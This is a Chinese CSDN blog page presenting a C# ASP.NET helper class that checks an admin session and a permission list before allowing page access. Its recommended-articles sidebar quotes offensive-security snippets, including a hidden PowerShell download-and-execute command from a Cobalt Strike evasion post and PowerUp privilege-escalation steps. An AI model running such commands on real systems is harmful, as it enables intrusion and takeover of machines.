会话类 Power.cs

最新推荐文章于 2024-07-30 10:56:44 发布
最新推荐文章于 2024-07-30 10:56:44 发布
阅读量872 收藏
点赞数
分类专栏: .Net 文章标签: string javascript session access system class
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qdzx2008/article/details/485279
版权

using System;
using System.Web;

namespace Silk_Road.Class
{
 /// <summary>
 /// Power 的摘要说明。
 /// </summary>
 public class Power
 {
        /// <summary>
        /// 判断会话是否存在,并确认此页面或方法是否可被访问
        /// </summary>
        /// <param name="Power_Name">
        ///    权限内容,为 页面所在目录 + ":" + 执行命令 的组合
        ///    {                                  
        ///        注:执行命令                                                                        
        ///            增加数据--"Add"
        ///            管理数据--"Manage"  (包括修改、删除)
        ///            类别管理--"Sort"
        ///            数据审核--"Pass"
        ///            权限管理--"Power"
        ///     }
        /// </param>
        /// <returns>bool</returns>
        public static void Access(string Power_Name)
        {
            bool Accessed = false;
            Power.Session_State (); //判断会话是否存在

            string[] PowerList = (string[])HttpContext.Current .Session ["Admin_Power"];  //取权限数组
            //判断此管理员是否有此权限
            foreach(string str in PowerList)
            {
               if(Power_Name == str)
                   Accessed = true;
            }
            if(Accessed == false)
            {
                HttpContext.Current.Response .Redirect ("/Manage/error.aspx");
                HttpContext.Current .Response .End ();
            }
        }

        /// <summary>
        /// 判断会话是否存在,不存在就重新登录
        /// </summary>
        public static void Session_State()
        {
            //判断会话是否存在,不存在,报错,并重定向到Login.aspx
            if(HttpContext.Current .Session ["Admin_Name"] == null)
            {
                HttpContext.Current.Response .Write ("<script LANGUAGE='javascript'>alert('您的会话过期,请重新登录!');window.location='/Manage/Login.aspx';</script>");
                HttpContext.Current .Response .End ();
                return;
            }
        }
 }
}

posted

qdzx2008
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CS学习笔记】14、powerup提权的方法
TeamsSix 的 CSDN 空间
07-23 1743
0x00 介绍 PowerUp 所做的事是寻找可能存在弱点的地方,从而帮助提权。 利用 PowerUp 进行提权需要首先导入 ps1 文件powershell-import PowerUp.ps1,再执行powershell Invoke-AllChecks命令,使用 PowerUp 脚本可以快速的帮助我们发现系统弱点,从而实现提权的目的。 其中PowerUp.ps1文件可从这里下载:https://github.com/PowerShellMafia/PowerSploit/tree/master/Pr
Unity3d 周分享(20期 2019.6.30 )
热门推荐
游戏路上的小学生
06-30 1万+
选自过去1~2周 自己所看到外文内容:https://twitter.com/unity3d 和各种其他博客来源吧 1、Unity的Android音频延迟在2019.1.0 中改进 https://gametorrahod.com/unitys-android-audio-latency-improvement-in-2019-1-0/ 文章作者因为这个延迟问题,弄了一个,正是基于Op...
CS免杀
anwen12的博客
02-06 5087
Cobaltstrike 一、基础使用 ./teamserver 192.168.43.224 123456 启动服务器端 在windows下的链接 双击bat文件即可 在linux下 ./start.sh 让目标机器链接上teamserver 1.设置好监听器 2.生成攻击载荷 url它是个文件路径,就是让目标(受害者)通过地址下载恶意脚本 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring
纵有倚天剑还要屠龙刀,实现Power BI报表服务器自定义认证
人月神话
11-05 7296
纵有倚天剑还要屠龙刀,实现Power BI自定义认证 文章目录纵有倚天剑还要屠龙刀,实现Power BI自定义认证概述如何实现配置部署和Demo排错总结 概述 在Power BI 身份认证体系上,我们默认使用AD作为认证体系,AD即活动目录体系来说,是微软整个平台的核心,可以说是倚天剑。默认情况下, Power BI 报表服务器 接受指定 Negotiate 或 NTLM 身份验证的请求。 如果部...
Spark 2.x 机器学习秘籍(五)
龙哥盟
07-23 1110
无监督机器学习是一种学习技术,我们试图从一组未标记的观察中直接或间接(通过潜在因素)推断出推理。简而言之,我们试图在一组数据中找到隐藏的知识或结构,而不是最初标记训练数据。虽然大多数机器学习库实现在应用于大型数据集时会出现问题(迭代,多次传递,大量中间写入),但 Apache Spark 机器库通过提供专为并行处理和极大数据集设计的机器库算法而成功,使用内存进行中间写入。聚系统:将输入分为硬分(仅属于单个簇)或软分(概率成员和重叠)。降维系统:使用原始数据的简化表示找到隐藏因素。
Swashbuckle.AspNetCore介绍
A_nanda的博客
03-27 1195
事实上,推断的值是,如果您应用它将设置为的属性,这将搞砸 ,ASP.NET Core 附带的元数据组件,并且 Swashbuckle 严重依赖。例如,使用默认路由时,上述文档将在“/swagger/v1/swagger.json”和“/swagger/v2/swagger.json”中提供。如果您有多个 XML 注释文件(例如,控制器和模型的单独库),则可以多次调用 IncludeXmlComments 方法,它们都将合并到输出的 Swagger JSON 中。但是,如有必要,您可以创建多个文档。
CobaltStrike使用-第五篇(Bypass UAC、CVE提权、Powerup提权)
Love&Share
12-05 4966
前四篇文章介绍了CS的基本使用方法和模块,以及钓鱼攻击的方法,本篇将会介绍使用CS进行提权操作 文章目录权限提升Bypass UACCVE提权PowerUp凭证和哈希获取Beacon 中的 Mimikatz 权限提升 在主机上线后,当某些操作需要管理员权限,而当前用户权限只有一般用户权限时,就需要提权操作了 自 Windows vista 开始,Windows 系统引进了用户账户控制机制,即 UACUser Account Control机制,UAC 机制在 Win 7中得到了完善。UAC 与 UNIX .
权限提升-Windows权限提升篇&溢出漏洞&宝塔面板Bypass&CS插件化&MSF模块化
siu~
03-22 1187
1、Web到Win系统提权-权限差异原因 2、Web到Win系统提权-溢出漏洞(MSF&CS) 3、Web到Win系统提权-集成软件(哥斯拉模块Bypass) 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
ADO.net与PowerBuilder
移动开发与培训
03-11 788
 以评测的形式通过一个非常简单的例子,把ADO.NET与PowerBuilder进行多方面的比较,从而揭示两种平台下数据库应用开发能力,包括功能、性能、体系结构的综合评价。1.   评测对象描述        .NET框架提供了强大的WINDOWS FORMS 工具,可以快速开发用户界面。同时,.NET框架提供了丰富的对象用来管理数据库操作,这些总称为ADO.NET,ADO.NET主要是一种
php简单的会话.zip
07-11
一个简单的php会话,使用session。 大概用法  example :  log in page : $session = session::getObject();  $session->set_ture(); // if $row['password'] ==  next page :  log ...
行业分-设备装置-多媒体会话控制器.zip
08-25
在现代信息技术领域,尤其是在电信、网络通信和多媒体应用中,这控制器扮演着至关重要的角色。本资料包"行业分-设备装置-多媒体会话控制器.zip"包含了对这一主题的深入探讨,特别是其中的"多媒体会话控制器.pdf...
诊断会话(大).emmx
04-22
这个思维导图用mindmaster画的,需要这个软件打开。自己总结(私藏品)了汽车行业14229诊断中的各种服务与各服务中字节的解释。10\11\19\22\27\2e\3e\等还有负响应
会话气泡电量.apk
11-14
会话气泡电量.apk
测试会话固定攻击.docx
09-06
测试会话固定攻击
JavaScript青少年简明教程:函数及其相关知识(下)
cnds123的专栏
07-26 645
JavaScript青少年简明教程:函数及其相关知识(下)
VUE3自定义指令防止重复点击多次提交
最新发布
MadSnail00的博客
07-30 66
vue3连续点击按钮重复提交,vue3自定义指令防止重复提交
【分享】前端程序员-技术网站推荐
一位前行者的博客
07-30 402
对于前端开发人员来说,以下是一些推荐的技术网站,这些网站提供了丰富的资源和知识,可以帮助你提升前端开发技能:收集一些 、、 的网站 vite 官方中文文档 element-plus 官方中文文档 pinia 官方中文文档 vue-router 官方中文文档 Tailwind CSS 官方文档 vitest 官方中文文档 es6 中文文档 axios 官方中文文档 vxetable 官方中文文档 lodash 中文文档 echarts 官方中文文档 animat
我们的前端开发逆天了!1 小时搞定了新网站,还跟我说 “不要钱”
努力做最接地气的编程干货分享,感谢关注
07-29 1262
本文将带你了解一个新的 Web 框架 **Astro**,并手把手带你使用 Astro 搭建一个属于自己的站点,用过的都说真香!
linux下的网络编程,使用c语言,实现多人会话聊天室.具体功能包括: 注册与登录系统,
09-12
在Linux下使用C语言实现多人会话聊天室需要基于网络编程的一些知识和技术。下面是具体的功能实现: 1. 注册与登录系统:聊天室的用户需要进行注册和登录才能使用。通过使用TCP协议,可以使用Socket编程在服务器端...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值